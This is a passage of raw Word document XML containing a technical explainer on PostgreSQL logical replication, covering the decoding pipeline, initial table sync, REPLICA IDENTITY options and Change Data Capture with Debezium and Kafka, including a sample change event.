    <w:p w14:paraId="7535E57F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Subscription creates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB2257C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    - Replication slot on primary (for WAL position tracking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6054D2B2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    - Background worker process (logical replication worker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3123EFE6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    - Table mapping (publisher table → subscriber table)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB72059" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The logical decoding pipeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E60CF58" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FF5B15" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>WAL record (physical, binary format)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6955EEB2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B31A1A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Logical decoder (pg_logical_emit_message, output plugin API)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FD1F74" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Reads WAL record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AC6DF9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Looks up tuple schema (OID → column names, types)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1003B237" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Reconstructs logical operation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D8A9C4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    WAL: "heap update page 42 offset 7, old xmax=1234, new tuple: [bytes]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF5B07A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Logical: "UPDATE users SET email='new@example.com' WHERE id=42"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7FFDEE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3D637B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Output plugin (pgoutput — built-in plugin for logical replication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711E6595" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Serializes logical operation to wire protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362C07BB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Sends to subscriber</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52315B7D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F99FC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Logical replication worker (on subscriber)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02132EA5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Receives logical operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F1181B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Applies to subscriber tables using standard INSERT/UPDATE/DELETE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20368513" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Updates subscription's remote_lsn (WAL position on publisher)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669BFC65" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The initial table sync:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092EAE5F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>When a subscription is created, existing data must be copied before streaming can begin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE439C4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74890A70" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Table sync process (per table, in parallel):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48625CA7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  1. Create snapshot on publisher (consistent point-in-time view)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00895727" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  2. COPY table data from publisher to subscriber (initial data load)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE11689" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     Uses separate connection from streaming replication connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692A556B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  3. After COPY: stream WAL changes from the snapshot LSN forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181BD270" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     (catching up on changes that occurred during the COPY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E64C556" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  4. Once caught up: hand off to main logical replication worker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF36C59" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67909920" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Multiple tables synced in parallel (max_sync_workers_per_subscription)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314F5823" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Large tables: COPY may take hours/days for TB-scale tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF505B0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  During this time: logical replication worker streams changes,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E81C03" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    queues them (if table not yet synced) or applies them (if synced)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10876839" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The replica identity problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B610F9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Logical replication must identify which row to UPDATE or DELETE on the subscriber. This requires a unique row identifier:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B5F820" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FCAB07" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>REPLICA IDENTITY options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3A2FB8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="36456935" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>DEFAULT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE1D50C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Use primary key columns to identify rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B6E914" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Most efficient (primary key is always indexed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45187530" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Problem: if replica table has different data (transformed rows), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565492DF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">           primary key may not uniquely identify the right row</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05934617" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="7DF481FF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>FULL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C02D5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Use all column values as the row identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B756E23" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Required when table has no primary key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230EF681" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Expensive: each UPDATE/DELETE in WAL includes entire old row image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101378C6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">             → large WAL records, high WAL volume</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560D0976" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D30E349" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>INDEX:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678C452E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Use a specific unique index as the row identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B46D180" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Alternative to primary key for tables with non-PK unique identifiers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DFE288" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46025CBD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>NOTHING:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AC96A0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  No replica identity (table cannot have UPDATEs or DELETEs replicated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1B5B67" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Only INSERTs replicated — for append-only tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078E721C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="7EBC6107" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Practical implication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE346FA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Tables without primary keys: must use REPLICA IDENTITY FULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79269AFE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → WAL volume increases significantly (each row change writes entire row twice)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5914E8A0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Add primary keys to all replicated tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122D20C3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Change Data Capture (CDC) — Logical Replication for Data Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684E9C20" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Logical decoding powers </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Change Data Capture</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> — streaming database changes to downstream systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC855D0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6290CC66" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CDC architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FE5BF7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  PostgreSQL primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241AF6B0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    ↓ WAL (physical)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39767D41" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Debezium connector (reads logical decoding output via pgoutput or wal2json plugin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AFECC0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    ↓ Change events (JSON)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251A35D4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Apache Kafka (durable, ordered event stream)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798FC2B4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    ↓ Kafka consumers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2D788A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  ┌─────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A76176E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  │  Elasticsearch (search index updated)        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6DB3DF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  │  Redis (cache invalidation on data change)   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9A54D8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  │  Data warehouse (Snowflake, BigQuery)         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B5AC59" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  │  Microservices (order service, email service) │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A1AFEB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  │  Audit log (immutable change history)         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E69F30" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  └─────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1475E5F5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="0A03A2AD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Debezium change event structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488482F1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA024F4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    "before": {old row values or null for INSERT},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B67079" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    "after": {new row values or null for DELETE},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72057E89" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    "source": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D450E5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      "lsn": "0/F234A890",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073041A1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      "txId": 12345,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61526832" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      "ts_ms": 1705315200000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31743489" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      "table": "orders",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52103499" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      "schema": "public"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BEC0B3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF37B2D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    "op": "u",  // c=create, u=update, d=delete, r=read(snapshot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C9599E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    "ts_ms": 1705315200123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7FEE5E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E8828A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
